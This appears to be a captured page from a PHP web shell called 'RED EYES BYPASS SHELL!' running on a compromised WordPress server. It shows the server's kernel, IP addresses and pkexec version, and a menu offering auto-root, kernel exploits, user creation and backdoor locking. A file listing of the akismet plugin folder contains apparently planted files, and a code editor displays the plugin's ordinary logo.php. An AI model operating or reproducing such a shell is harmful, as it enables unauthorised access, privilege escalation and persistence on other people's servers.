Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
plugins /
akismet /
views /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
activate.php
177
B
-rwxr-xr-x
config.php
14.75
KB
-rwxr-xr-x
connect-jp.php
4.98
KB
-rwxr-xr-x
enter.php
1.02
KB
-rwxr-xr-x
get.php
1017
B
-rwxr-xr-x
logo.php
770
B
-rwxr-xr-x
notice.php
13.07
KB
-rwxr-xr-x
predefined.php
318
B
-rwxr-xr-x
setup.php
324
B
-rwxr-xr-x
start.php
816
B
-rwxr-xr-x
stats.php
1.05
KB
-rwxr-xr-x
title.php
125
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : logo.php
<?php //phpcs:disable VariableAnalysis // There are "undefined" variables here because they're defined in the code that includes this file as a template. ?> <div class="akismet-masthead__logo-container"> <?php if ( isset( $include_logo_link ) && $include_logo_link === true ) : ?> <a href="<?php echo esc_url( Akismet_Admin::get_page_url() ); ?>" class="akismet-masthead__logo-link"> <?php endif; ?> <img class="akismet-masthead__logo" src="<?php echo esc_url( plugins_url( '../_inc/img/akismet-refresh-logo@2x.png', __FILE__ ) ); ?>" srcset="<?php echo esc_url( plugins_url( '../_inc/img/akismet-refresh-logo.svg', __FILE__ ) ); ?>" alt="Akismet logo" /> <?php if ( isset( $include_logo_link ) && $include_logo_link === true ) : ?> </a> <?php endif; ?> </div>
Close